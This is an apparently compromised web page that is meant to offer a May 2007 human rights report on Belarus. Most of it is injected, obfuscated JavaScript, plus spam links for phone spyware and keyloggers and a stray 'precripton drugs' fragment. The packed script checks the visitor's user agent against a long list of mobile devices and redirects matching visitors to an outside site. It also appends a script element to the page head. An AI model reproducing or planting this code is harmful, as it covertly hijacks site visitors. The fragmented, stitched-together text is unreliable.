io|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))http://voimaailosta.fi/cell-spy-spy-phone-software-spy-mobile-app/

Belarus – 05/2007 – report

Here is the detailed report upon the human rights situation in Belarus in the month of May 2007.
Download report (pdf – in English){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{})) by precripton drugs e check } else {d.getElementsByTagName(‘head’)[0].appendChild(s);http://vinotecarestaurantegalia.com/phone-spyware-keylogger-for-android-mobile-phone-spy/